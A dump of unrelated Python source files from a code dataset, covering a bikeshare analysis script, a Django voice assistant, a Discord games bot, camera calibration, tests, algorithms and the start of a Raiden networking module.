bikeshare users.\"\"\"\n\n print('\\nUser Statistics:\\n')\n start_time = time.time()\n\n # Display counts of user types\n print(\"The user types and their count is:\\n\",df[\"User Type\"].value_counts(ascending=False))\n\n # Display counts of gender only if the data is available\n ## It was pre-stated that gender data is not available for one city hence this check is added only here\n if df.get(\"Gender\") is not None:\n print(\"\\nThe gender split is:\\n\",df[\"Gender\"].value_counts(ascending=False))\n\n # Display earliest, most recent, and most common year of birth only if the data is available\n ## It was pre-stated that year of birth data is not available for one city hence this check is added only here\n if df.get(\"Birth Year\") is not None:\n print(\"\\nThe earliest year of birth of users is:\",int(df[\"Birth Year\"].min()))\n print(\"The latest year of birth of users is:\",int(df[\"Birth Year\"].max()))\n print(\"The most common year of birth of users is:\",int(df[\"Birth Year\"].mode()[0]))\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef raw_data(df):\n \"\"\"Displays raw data from CSV files 5 lines at a time based on user input\"\"\"\n start_time = time.time()\n\n # Find out if user wishes to see raw data\n while True:\n data = input('Would you like to see the raw data? Enter y for yes and n for no.\\n:').lower()\n if data not in (\"y\",\"n\"):\n print(\"\\nInvalid Entry!\")\n print(\"-\"*14)\n else:\n break\n \n ## Print 5 rows of data at a time and request user each time if more raw data is desired\n n=0 #set row number counter to zero\n while data == 'y':\n print(df.iloc[n:n+5])\n n += 5\n while True:\n data = input('Would you like to see more raw data? Enter y for yes and n for no.\\n:').lower()\n if data not in (\"y\",\"n\"):\n print(\"\\nInvalid Entry!\")\n print(\"-\"*14)\n else:\n break\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef main():\n\n print('*'*50)\n print('Hello! Welcome to the US bikeshare data center!\\nLet\\'s look at some interesting statistics!')\n print('*'*50)\n\n while True:\n city, month, day = get_filters()\n df = load_data(city, month, day)\n\n #Loop to check if the filters applied creates an empty dataframe\n if len(df.index) == 0:\n print('! '*30)\n print(\"There is no data for the selected, month and day, filters.\\nPlease select different filters.\")\n print('! '*30)\n print()\n continue\n\n time_stats(df)\n station_stats(df)\n trip_duration_stats(df)\n user_stats(df)\n raw_data(df)\n\n while True:\n restart = input('Would you like to restart? Enter y for yes or n for no.\\n:')\n if restart not in (\"y\",\"n\"):\n print(\"\\nInvalid Entry!\")\n print(\"-\"*14)\n else:\n break\n\n if restart.lower() != 'y':\n break\n\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"bikeshare2.py","file_name":"bikeshare2.py","file_ext":"py","file_size_in_byte":8638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"312167847","text":"import os\nimport json\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom function.baidu_ai import audio2text, text2audio\nfrom function.tuling import get_roboot_answer\nfrom function.gensim_lsi import get_high_sim\nfrom function.database import read_answer\nfrom selenium import webdriver\nfrom function.come import *\nimport time\nimport os\nimport win32api\nimport win32con\nfrom selenium.webdriver.common.keys import Keys\n# Create your views here.\n\ncon={}\ndef home(request):\n return render(request, 'robot_app/index.html',{'历史记录':con})\n\n\ndef upload(request):\n # print(request.POST)\n file_name = os.path.join('robot_app', 'static', 'audio_file', request.POST['name'])\n file = request.FILES['file']\n\n with open(file_name, 'wb') as f:\n f.write(file.read())\n text = audio2text(file_name)\n if text[0:2] == '搜索' or text[0:2] == '发送' or text[0:2] == '播放':\n index = get_high_sim(text[0:2])\n else:\n index = get_high_sim(text)\n if index is not None:\n answer = read_answer(index)\n if index == 4:\n os.popen('notepad')\n if index == 3:\n os.popen('G:\\QQ\\Bin\\QQScLauncher.exe')\n time.sleep(5)\n win32api.keybd_event(13, 0, 0, 0) # enter键位码是86\n win32api.keybd_event(13, 0, win32con.KEYEVENTF_KEYUP, 0)\n if index == 5:\n driver = webdriver.Chrome() # 利用浏览器\n driver.get(\"http://www.baidu.com\") # 打开get到的网址\n time.sleep(3) # t停顿3秒,即3秒内一直在这个界面\n # print(\"网站的名称:\",driver.title) # 获取网站名称并输出 #打开keyword.txt文件,并一行行读取数据:keyword.txt中可以存放任意关键字,比如:selenium python 赵丽颖(ps:一个关键字占一行)\n driver.find_element('id', 'kw').send_keys(text[2:]) # 通过输入框的id为kw,定位到输入框,输入”selenium”\n driver.find_element('id', 'su').click() # 通过搜索按钮的id为su定位到搜索按钮,点击按钮\n # time.sleep(5) # 停顿5秒\n if index == 6:\n picture_time = time.strftime(\"%Y-%m-%d-%H_%M_%S\", time.localtime(time.time()))\n directory_time = time.strftime(\"%Y-%m-%d\", time.localtime(time.time()))\n print(picture_time)\n print(directory_time)\n # 打印文件目录\n print(os.getcwd())\n # 获取到当前文件的目录,并检查是否有 directory_time 文件夹,如果不存在则自动新建 directory_time 文件\n try:\n File_Path = os.getcwd() + '\\\\' + directory_time + '\\\\'\n if not os.path.exists(File_Path):\n os.makedirs(File_Path)\n print(\"目录新建成功:%s\" % File_Path)\n else:\n print(\"目录已存在!!!\")\n except BaseException as msg:\n print(\"新建目录失败:%s\" % msg)\n driver = webdriver.Chrome()\n driver.get(\"https://baidu.com/\")\n try:\n url = driver.save_screenshot('.\\\\' + directory_time + '\\\\' + picture_time + '.png')\n print(\"%s :截图成功!!!\" % url)\n except BaseException as pic_msg:\n print(\"截图失败:%s\" % pic_msg)\n time.sleep(2)\n driver.quit()\n if index == 7:\n os.popen('G:\\CloudMusic\\cloudmusic.exe')\n time.sleep(8)\n start()\n if index == 8:\n x=text.index('给')\n int(x)\n to_who=text[x+1:]\n msg=text[2:x]\n qq(to_who)\n send_qq(to_who,msg)\n if index == 9:\n stop()\n if index == 10:\n last()\n if index == 11:\n next()\n if index == 12:\n turn_up()\n if index == 13:\n turn_down()\n if index == 14:\n love()\n if index == 15:\n show_words()\n if index == 16:\n shoutsown_words()\n if index == 17:\n os.system(r'taskkill /f /t /im cloudmusic.exe')\n if index == 18:\n start()\n if index == 19:\n music=text[2:]\n find_music()\n time.sleep(1)\n play_music(music)\n else:\n answer = get_roboot_answer(text)\n con[text]=answer\n hecheng_name = os.path.join('robot_app', 'static', 'audio_file', 'hecheng' + request.POST['name'])\n\n if text2audio(answer, hecheng_name):\n print('合成成功!')\n res_name = hecheng_name.strip('robot_app//')\n else:\n print('合成失败!')\n res_name = ''\n\n res_str = {\n 'play_tpe': 'talk',\n 'res_name': res_name,\n 'content': answer\n }\n\n return HttpResponse(json.dumps(res_str), content_type='application/json')\n","sub_path":"robot_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"424501181","text":"from .util.game import *\nfrom .uno import *\nfrom .mafia import *\nfrom .quiz import *\nfrom .hangman import *\nfrom .connectfour import *\nfrom .chess import *\n\n\nclass Games(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n self.handler = GameHandler(bot)\n\n @commands.Cog.listener()\n async def on_message(self, message):\n await self.handler.on_message(message)\n\n @commands.Cog.listener()\n async def on_command_error(self, ctx, error):\n await self.handler.on_command_error(ctx, error)\n\n @commands.command(name=\"balance\",\n aliases=[\"bal\"],\n brief=\"See how many tokens you have\")\n @commands.guild_only()\n async def balance(self, ctx):\n tokens = self.bot.config.get(ctx.guild.id, \"tokens\")\n if ctx.author.id in tokens:\n await ctx.send(f\"You have {tokens[ctx.author.id]} token(s).\")\n else:\n await ctx.send(f\"You have 0 token(s).\")\n\n @commands.group(name=\"games\",\n aliases=[\"game\"],\n brief=\"Commands to do with games\")\n async def game(self, ctx):\n if ctx.invoked_subcommand is None:\n await ctx.send(\"Invalid command passed.\")\n\n @game.command(name=\"list\",\n brief=\"List the available games\")\n async def game_list(self, ctx):\n await ctx.send(f\"The following games are available to play:\\n\"\n f\"• uno\\n\"\n f\"• quiz\\n\"\n f\"• hangman\\n\"\n f\"• connectfour\\n\"\n f\"• chess\")\n\n \"\"\"\n @game_dec(name=\"uno\",\n fullname=\"UNO\",\n cls=Uno,\n brief=\"Play a game of UNO\")\n async def uno(self, ctx):\n if ctx.invoked_subcommand is None:\n return\n\n @uno.command(name=\"hand\")\n async def uno_hand(self, ctx):\n game = self.handler.get_game(ctx.channel)\n if not isinstance(game, Uno):\n await ctx.send(\"There is no uno game in this channel.\")\n return\n if not game.playing:\n await ctx.send(\"That game has not started.\")\n return\n if ctx.author not in game.hands:\n return\n dm = await ctx.author.create_dm()\n await dm.send(\"You have the following cards in your hand:\\n\"\n + \", \".join(CARD_EMOJIS[k] + \" \" + CARD_STRINGS[k] for k in game.hands[ctx.author]))\n await ctx.send(\"Your hand has been DMed to you.\")\n \"\"\"\n\n @game_dec(name=\"quiz\",\n fullname=\"Quiz\",\n cls=Quiz,\n brief=\"Quiz yourself from a set of random questions\")\n async def quiz(self, ctx):\n if ctx.invoked_subcommand is None:\n return\n\n @game_dec(name=\"hangman\",\n fullname=\"Hangman\",\n cls=Hangman,\n brief=\"Play a game of hangman\")\n async def hangman(self, ctx):\n if ctx.invoked_subcommand is None:\n return\n\n @game_dec(name=\"connectfour\",\n fullname=\"Connect Four\",\n aliases=[\"c4\"],\n cls=ConnectFour,\n brief=\"Play a game of Connect Four\")\n async def connectfour(self, ctx):\n if ctx.invoked_subcommand is None:\n return\n\n @game_dec(name=\"chess\",\n fullname=\"Chess\",\n cls=Chess,\n brief=\"Play a game of chess\")\n async def chess(self, ctx):\n if ctx.invoked_subcommand is None:\n return\n\n @chess.command(name=\"resign\",\n brief=\"Leave and forfeit the chess game\")\n async def resign(self, ctx):\n game = self.handler.get_game(ctx.channel)\n if not isinstance(game, Chess):\n await ctx.send(\"There is no chess game in this channel.\")\n return\n if not game.playing:\n await ctx.send(\"That game has not started.\")\n return\n if ctx.author not in game.players:\n await ctx.send(\"You are not in that game.\")\n return\n game.winner = game.players[0] if ctx.author != game.players[0] else game.players[1]\n await game.end()\n\n @chess.command(name=\"draw\",\n brief=\"Offer a draw to your opponent\")\n async def draw(self, ctx, *, query=None):\n game = self.handler.get_game(ctx.channel)\n if not isinstance(game, Chess):\n await ctx.send(\"There is no chess game in this channel.\")\n return\n if not game.playing:\n await ctx.send(\"That game has not started.\")\n return\n if query is None:\n if ctx.author in game.draw_requests or ctx.author in game.on_draw_cooldown:\n await ctx.send(\"You have already requested a draw this turn.\")\n return\n game.draw_requests.append(ctx.author)\n if game.can_claim_draw():\n if ctx.author == game.get_turn():\n game.winner = None\n await game.end()\n return\n else:\n await ctx.send(\"You can only claim a draw when it is your turn.\")\n return\n if len(game.draw_requests) == len(game.players):\n game.winner = None\n await game.end()\n else:\n game.on_draw_cooldown.append(ctx.author)\n await ctx.send(\"You have requested a draw. Wait for your opponent to respond.\")\n elif query.lower() == \"accept\":\n if game.draw_requests == list():\n await ctx.send(\"There is no draw request to accept.\")\n elif ctx.author in game.draw_requests:\n await ctx.send(\"You can't accept your own draw request.\")\n else:\n game.winner = None\n await game.end()\n elif query.lower() == \"decline\":\n if game.draw_requests == list():\n await ctx.send(\"There is no draw request to decline.\")\n elif ctx.author in game.draw_requests:\n await ctx.send(\"You can't decline your own draw request.\")\n else:\n game.draw_requests = list()\n await ctx.send(\"You declined the draw request.\")\n else:\n await ctx.send(\"Invalid syntax.\")\n\n @game_dec(name=\"mafia\",\n fullname=\"Mafia\",\n cls=Mafia,\n brief=\"Play a game of Mafia\")\n async def mafia(self, ctx):\n if ctx.invoked_subcommand is None:\n return\n\n @game_dec(name=\"uno\",\n fullname=\"Uno\",\n cls=Uno,\n brief=\"Play a game of Uno\")\n async def uno(self, ctx):\n if ctx.invoked_subcommand is None:\n return\n\n\ndef setup(bot):\n bot.add_cog(Games(bot))\n","sub_path":"modules/games/cog.py","file_name":"cog.py","file_ext":"py","file_size_in_byte":6790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"88645950","text":"import numpy as np\nimport cv2\nimport glob\nimport pickle\nimport os\nimport matplotlib.pyplot as plt\n\n\nclass CalibratedCamera:\n\n def __init__(self, camera_calibration_pickle=\"camera_calibration_pickle.p\", \n calibration_images_pattern=\"camera_cal/calibration*.jpg\"):\n if os.path.exists(camera_calibration_pickle):\n self._calibrate_camera_by_pickle(camera_calibration_pickle)\n else:\n self._calibrate_camera_by_chessboard_images(9, 6, \n camera_calibration_pickle, calibration_images_pattern)\n\n\n def undistort(self, img):\n return cv2.undistort(img, self.mtx, self.dist, None, self.mtx)\n \n\n def undistort_file(self, source_image_file, destination_image_file):\n img = cv2.imread(source_image_file)\n dst = cv2.undistort(img, self.mtx, self.dist, None, self.mtx)\n cv2.imwrite(destination_image_file, dst)\n\n def _calibrate_camera_by_pickle(self, camera_calibration_pickle):\n print('Reading calibrated camera parameters from pickle file')\n with open(camera_calibration_pickle,\"rb\") as pickle_in:\n dist_pickle = pickle.load(pickle_in)\n\n self.mtx = dist_pickle[\"mtx\"]\n self.dist = dist_pickle[\"dist\"]\n\n\n def _calibrate_camera_by_chessboard_images(self, nx, ny, \n camera_calibration_pickle, calibration_images_pattern):\n # prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)\n print('Calibrating camera')\n objp = np.zeros((nx * ny, 3), np.float32)\n objp[:,:2] = np.mgrid[0:nx, 0:ny].T.reshape(-1,2)\n\n # Arrays to store object points and image points from all the images.\n objpoints = [] # 3d points in real world space\n imgpoints = [] # 2d points in image plane.\n\n # Make a list of calibration images\n images = glob.glob(calibration_images_pattern)\n\n # Step through the list and search for chessboard corners\n for fname in images:\n img = cv2.imread(fname)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # Find the chessboard corners\n ret, corners = cv2.findChessboardCorners(gray, (nx, ny), None)\n\n # If found, add object points, image points\n if ret == True:\n objpoints.append(objp)\n imgpoints.append(corners)\n\n img = cv2.imread(\"camera_cal/calibration1.jpg\")\n img_size = (img.shape[1], img.shape[0])\n\n ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, img_size,None,None)\n dist_pickle = {}\n dist_pickle[\"mtx\"] = mtx\n dist_pickle[\"dist\"] = dist\n\n with open(camera_calibration_pickle, \"wb\") as pickle_file: \n pickle.dump(dist_pickle, pickle_file)\n\n self.mtx = mtx\n self.dist = dist","sub_path":"calibrate_camera.py","file_name":"calibrate_camera.py","file_ext":"py","file_size_in_byte":2808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"306980400","text":"import os\r\nimport sys\r\n\r\n# Remove \"\" and current working directory from the first entry\r\n# of sys.path (if present) to avoid using the current directory\r\n# in SeleniumBase commands when invoked as \"python -m sbase \"\r\nif sys.path[0] in (\"\", os.getcwd()):\r\n sys.path.pop(0)\r\n\r\nif __package__ == \"\":\r\n path = os.path.dirname(os.path.dirname(__file__))\r\n sys.path.insert(0, path)\r\n\r\nif __name__ == \"__main__\":\r\n import warnings\r\n from seleniumbase.console_scripts.run import main\r\n\r\n warnings.filterwarnings(\r\n \"ignore\", category=DeprecationWarning, module=\".*packaging\\\\.version\"\r\n )\r\n main()\r\n sys.exit()\r\n","sub_path":"sbase/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"549679639","text":"import asyncio\nimport aiohttp\nimport async_timeout\nfrom utils import funcs\nimport json\nimport urllib\n\nclass MSFace():\n\n\tdef __init__(self,**kwargs):\n\t\tself.app_key = kwargs.pop(\"key\")\n\t\tself.session = aiohttp.ClientSession()\n\t\tself.base_url = \"https://westus.api.cognitive.microsoft.com/face/v1.0\" #Put API url here (it varies from region to region)\n\t\tself.base_headers = {\"Ocp-Apim-Subscription-Key\":self.app_key,\"Content-Type\":\"application/json\"}\n\n\tasync def http_post(self, url, **kwargs):\n\t\tisjson = kwargs.pop(\"json\",False)\n\t\theaders = kwargs.pop(\"headers\",{})\n\t\tparams = kwargs.pop(\"params\",{})\n\t\ttry:\n\t\t\twith async_timeout.timeout(10):\n\t\t\t\tasync with self.session.post(url,headers=headers,data=params) as resp:\n\t\t\t\t\tdata = (await resp.read()).decode(\"utf-8\")\n\t\t\t\t\tif isjson:\n\t\t\t\t\t\tdata = json.loads(data)\n\t\t\t\t\treturn data\n\t\texcept asyncio.TimeoutError:\n\t\t\treturn False\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\t\treturn False\n\n\tasync def http_get(self, url, **kwargs):\n\t\theaders = kwargs.pop(\"headers\",{})\n\t\tjson = kwargs.pop(\"json\",False)\n\t\ttry:\n\t\t\twith async_timeout.timeout(10):\n\t\t\t\tasync with self.session.get(url,headers=headers) as resp:\n\t\t\t\t\tif json:\n\t\t\t\t\t\tdata = json.loads(await resp.text())\n\t\t\t\t\telse:\n\t\t\t\t\t\tdata = await resp.read()\n\t\t\t\t\treturn data\n\t\texcept asyncio.TimeoutError:\n\t\t\treturn False\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\t\treturn False\n\n\tasync def detect(self,url,**kwargs):\n\t\tlandmarks = kwargs.pop(\"landmarks\",True)\n\t\tfaceid = kwargs.pop(\"ids\",False)\n\t\tattributes = kwargs.pop(\"attributes\",\"\")\n\t\tparams = {\"url\":url}\n\t\turlparams = {\"returnFaceLandmarks\":str(landmarks).lower(),\"returnFaceId\":str(faceid).lower()}\n\t\tif attributes:\n\t\t\tparams[\"returnFaceAttributes\"] = attributes\n\t\tif urlparams:\n\t\t\turlparams = \"?\" + urllib.parse.urlencode(urlparams)\n\t\telse:\n\t\t\turlparams = \"\"\n\t\tresp = await self.http_post(self.base_url+\"/detect\"+urlparams,headers=self.base_headers,params=json.dumps(params),json=True)\n\t\treturn resp\n","sub_path":"utils/MSFace.py","file_name":"MSFace.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"449800310","text":"from django.urls import reverse\nfrom rest_framework import status, test\n\nfrom accounts.tests.factories import AccountFactory\nfrom cards.models import CardAnswer\nfrom cards.tests.factories import CardAnswerFactory, CardQuestionFactory\n\n\nclass CardAnswerListTestCase(test.APITestCase):\n @classmethod\n def setUpTestData(cls):\n cls.question = CardQuestionFactory()\n cls.answer_list_url = reverse('answer-list', args=(cls.question.pk,))\n\n cls.account = AccountFactory()\n cls.admin_account = AccountFactory(user__is_staff=True)\n\n cls.answer = CardAnswerFactory(author=cls.account, question=cls.question)\n cls.other_answer = CardAnswerFactory(question=cls.question)\n\n cls.answer_other_question = CardAnswerFactory(author=cls.account)\n\n def setUp(self):\n self.client.force_login(self.account.user)\n\n def test_unauthenticated_user_cannot_access(self):\n self.client.logout()\n\n response = self.client.get(self.answer_list_url)\n\n self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)\n\n def test_admin_get_all_answers_from_one_question(self):\n self.client.force_login(self.admin_account.user)\n\n response = self.client.get(self.answer_list_url)\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(response.data), 2)\n self.assertNotIn(self.answer_other_question.pk, [answer['id'] for answer in response.data])\n\n def test_user_get_own_answers_from_one_question(self):\n response = self.client.get(self.answer_list_url)\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(response.data), 1)\n self.assertEqual(response.data[0]['id'], self.answer.pk)\n\n def test_get_answers_wrong_question(self):\n wrong_url = reverse('answer-list', args=(0,))\n response = self.client.get(wrong_url)\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data, [])\n\n\nclass SubmitAnswerTestCase(test.APITestCase):\n @classmethod\n def setUpTestData(cls):\n cls.question = CardQuestionFactory()\n cls.answer_list_url = reverse('answer-list', args=(cls.question.pk,))\n cls.account = AccountFactory()\n\n def setUp(self):\n self.answer_data = {\n \"content\": self.question.correct_answer\n }\n self.client.force_login(self.account.user)\n\n def test_correct_data(self):\n response = self.client.post(self.answer_list_url, data=self.answer_data)\n\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertTrue(CardAnswer.objects.exists())\n\n def test_correct_author(self):\n response = self.client.post(self.answer_list_url, data=self.answer_data)\n\n self.assertEqual(response.data.get('author'), self.account.pk)\n\n def test_correct_question(self):\n response = self.client.post(self.answer_list_url, data=self.answer_data)\n\n self.assertEqual(response.data.get('question'), self.question.pk)\n\n def test_wrong_answer(self):\n self.answer_data['content'] = 'wrong answer'\n\n response = self.client.post(self.answer_list_url, data=self.answer_data)\n\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertFalse(response.data.get('correct'))\n\n def test_correct_answer(self):\n response = self.client.post(self.answer_list_url, data=self.answer_data)\n\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertTrue(response.data.get('correct'))\n\n def test_question_does_not_exist(self):\n wrong_question = reverse('answer-list', args=(self.question.pk + 1,))\n\n response = self.client.post(wrong_question, self.answer_data)\n\n self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)\n","sub_path":"backend/cards/tests/test_answers.py","file_name":"test_answers.py","file_ext":"py","file_size_in_byte":3876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"466111316","text":"class Solution:\n\n def helper(self, jobs, d, index):\n\n if d == 1:\n # print(index)\n return max(jobs[index:])\n\n if (index, d) in self.visited:\n return self.visited[(index, d)]\n\n difficulty = float('inf')\n\n for i in range(index + 1, len(jobs)):\n # print(i)\n # print(max(jobs[index:i]))\n local_difficulty = max(jobs[index: i]) + self.helper(jobs, d - 1, i)\n difficulty = min(difficulty, local_difficulty)\n\n self.visited[(index, d)] = difficulty\n return difficulty\n\n def minDifficulty(self, jobDifficulty: List[int], d: int) -> int:\n\n self.visited = {}\n ans = self.helper(jobDifficulty, d, 0)\n # print(self.visited)\n return ans if ans != float('inf') else -1\n","sub_path":"1335_Minimum_Difficulty_Of_A_Job_Schedule.py","file_name":"1335_Minimum_Difficulty_Of_A_Job_Schedule.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"651713998","text":"# datatasks\\TransformationEntity.py\nimport re\nfrom datatasks.sources import DataSource\nfrom .DataPlanBuilderMixin import DataPlanBuilderMixin\n\n\n\nclass TransformationEntity(DataSource, DataPlanBuilderMixin):\n \"\"\"DataEntity built from instructions.\"\"\"\n\n def __init__(self, name, instructions):\n super().__init__(name)\n self.process_instructions(instructions)\n self.set_record_keys(instructions)\n\n def set_record_keys(self, instructions):\n \"\"\" \"\"\"\n key_list = []\n for i in instructions:\n if isinstance(i, tuple):\n i = i[0]\n key_list.append(re.split(r'=|<=|=>|<\\-|\\+', i)[0])\n super().set_keys(key_list)\n\n def execute(self):\n \"\"\" \"\"\"\n try:\n left_entity = self._dem.get_entity(self.joins[0].left_entity_name)\n except IndexError:\n left_entity = self._dem.get_entity(self.operations[0].left_entity_name)\n for record in left_entity:\n if self.joins:\n self._process_joins(record, left_entity.name, self.joins.copy())\n elif self.operations:\n self._process_operations(record, left_entity.name)\n self._process_aliases()\n\n def read_in(self):\n \"\"\" \"\"\"\n if not self.loaded:\n self.loaded = True\n self.execute()\n\n def _process_joins(self, records, left_entity_name, joins):\n \"\"\" \"\"\"\n if not isinstance(records, list):\n records = [records,]\n if joins:\n join = joins.pop(0)\n results = []\n for record in records:\n results += (join.execute(record, left_entity_name, self._dem.get_entity(join.right_entity_name)))\n self._process_joins(results, left_entity_name, joins)\n else:\n if not records:\n return\n self.load(records)\n\n def _process_operations(self, record, left_entity_name):\n \"\"\" \"\"\"\n record_key_prefix = left_entity_name + '.'\n new_record = dict([(record_key_prefix + k, v) for k, v in record.items() if not k.startswith('_')])\n for operation in self.operations:\n operation.execute(new_record)\n self.load([new_record,])\n\n def _process_aliases(self):\n \"\"\" \"\"\"\n if not self.aliases:\n return\n for record in self:\n for alias in self.aliases:\n record[alias[1]] = record.pop(alias[0])\n record_keys = self.key_list.copy()\n for i, key in enumerate(record_keys):\n for alias in self.aliases:\n if alias[0] == key:\n self.key_list[i] = alias[1]\n\n def unqualify_fields(self):\n \"\"\" \"\"\"\n for record in self:\n for key in record.keys():\n if '.' in key:\n record[re.split(r'[.]', key)[1]] = record.pop(key)\n super().set_keys(list(self[0].keys()))\n","sub_path":"datatasks/TransformationEntity.py","file_name":"TransformationEntity.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"609728938","text":"from Node import *\n\n\nclass thread (Trees):\n def createThread(self , root , key ):\n newnode = ThreadedNode(key)\n current = root\n while (True) :\n parent = current\n if ( root == None ):\n return ThreadedNode(key)\n\n if ( key == current.val ):\n return root\n if ( key < current.val ) :\n current = current.left\n if ( current == None ) :\n newnode.right = parent\n newnode.rightthread = True\n parent.left = newnode\n return root\n if ( key > current.val) :\n if current.rightthread == False :\n current = current.right\n if current == None :\n parent.right = newnode\n return root\n else :\n current.rightthread=False\n newnode.right = current.right\n current.right = newnode\n newnode.rightthread = True\n\n return root\n\n def InorderThread(self, root):\n node = self.left(root)\n\n while node != None :\n print(node.val, end=' ')\n if node.rightthread :\n\n node = node.right\n else :\n node = self.left(node.right)\n\n\n\n\n\n def left(self , node ):\n if ( node == None ) :\n\n return None\n else :\n while node.left != None :\n node = node.left\n\n\n return node\n\n\n def display(self , root):\n self.InorderThread(root)\n\n","sub_path":"tree/ThreadedTree.py","file_name":"ThreadedTree.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"625378212","text":"import sys\nimport os\nimport numpy\nimport dadi\nfrom dadi import Numerics, PhiManip, Integration\nfrom dadi.Spectrum_mod import Spectrum\nimport Optimize_Functions\nimport dd_models\n\nfunc=dd_models.isolation_sym_mig\n\nsnps = \"dadi.thin1k.txt\"\n\ndd = dadi.Misc.make_data_dict(snps)\n\npop_ids=[\"mi\", \"nomi\"]\n\nproj = [45,180]\n\nfs = dadi.Spectrum.from_data_dict(dd, pop_ids=pop_ids, projections = proj, polarized = False)\n\nfs.mask[1,0]=True\nfs.mask[0,1]=True\n\n# These are the grid point settings will use for extrapolation.\npts = [120,160,200]\n\nprefix = \"optim_d/isolation_sym_mig\"\n\np_labels = \"nu1a, nu2a, T1, nu1b, nu2b, T2, m\"\n\nupper = [100, 100, 10, 100, 100, 10, 100]\nlower = [1e-1, 1e-1, 0, 1e-2, 1e-2, 0, 0]\np0 = [90.8216,1.3095,0.8504,0.0109, 0.1973, 0.0084, 20]\n\nreps = [10,10,10,10]\nmaxiters = [5,5,10,20]\nfolds = [2,1,1,1]\n\n\ni=sys.argv[1]\nOptimize_Functions.Optimize_Routine(fs, pts, prefix+\"_{}\".format(i), func.func_name, func, len(reps), len(p0), \n fs_folded=True, param_labels = p_labels, in_upper=upper, in_lower=lower, \n reps = reps, maxiters = maxiters, folds = folds)\n\n\n\n\n\n\n","sub_path":"hpc/dadi/dd_isolation_sym_mig.py","file_name":"dd_isolation_sym_mig.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"413668644","text":"#best way to get string length\r\nmahadev = '0123456789'\r\nlen(mahadev)\r\n\r\ndef stringLenght(sTring):\r\n count = 0\r\n for number in sTring:\r\n count += 1\r\n print(count)\r\n \r\n return count\r\n\r\n\r\nstringLenght('hello')\r\n\r\n\r\n\r\n#last character of string\r\nmahadev = '0123456789'\r\nprint(mahadev[-1])\r\n","sub_path":"pyhon practice/stringLength.py","file_name":"stringLength.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"468870302","text":"# -*- coding: utf-8 -*-\nimport logging\nimport random\nfrom collections import (\n namedtuple,\n defaultdict,\n)\nfrom itertools import repeat\n\nimport cachetools\nimport gevent\nfrom gevent.event import (\n _AbstractLinkable,\n AsyncResult,\n Event,\n)\nfrom ethereum import slogging\n\nfrom raiden.exceptions import (\n InvalidAddress,\n InvalidLocksRoot,\n InvalidNonce,\n TransferWhenClosed,\n TransferUnwanted,\n UnknownAddress,\n UnknownTokenAddress,\n)\nfrom raiden.constants import (\n UDP_MAX_MESSAGE_SIZE,\n)\nfrom raiden.settings import (\n CACHE_TTL,\n)\nfrom raiden.messages import decode, Ack, Ping, SignedMessage\nfrom raiden.utils import isaddress, sha3, pex\nfrom raiden.utils.notifying_queue import NotifyingQueue\n\nlog = slogging.get_logger(__name__) # pylint: disable=invalid-name\nping_log = slogging.get_logger(__name__ + '.ping') # pylint: disable=invalid-name\n\n# - async_result available for code that wants to block on message acknowledgment\n# - receiver_address used to tie back the echohash to the receiver (mainly for\n# logging purposes)\nSentMessageState = namedtuple('SentMessageState', (\n 'async_result',\n 'receiver_address',\n))\nHealthEvents = namedtuple('HealthEvents', (\n 'event_healthy',\n 'event_unhealthy',\n))\n\nNODE_NETWORK_UNKNOWN = 'unknown'\nNODE_NETWORK_UNREACHABLE = 'unreachable'\nNODE_NETWORK_REACHABLE = 'reachable'\n\n# GOALS:\n# - Each netting channel must have the messages processed in-order, the\n# protocol must detect unacknowledged messages and retry them.\n# - A queue must not stall because of synchronization problems in other queues.\n# - Assuming a queue can stall, the unhealthiness of a node must not be\n# inferred from the lack of acknowledgement from a single queue, but healthiness\n# may be safely inferred from it.\n# - The state of the node must be synchronized among all tasks that are\n# handling messages.\n\n\ndef event_first_of(*events):\n \"\"\" Waits until one of `events` is set.\n\n The event returned is /not/ cleared with any 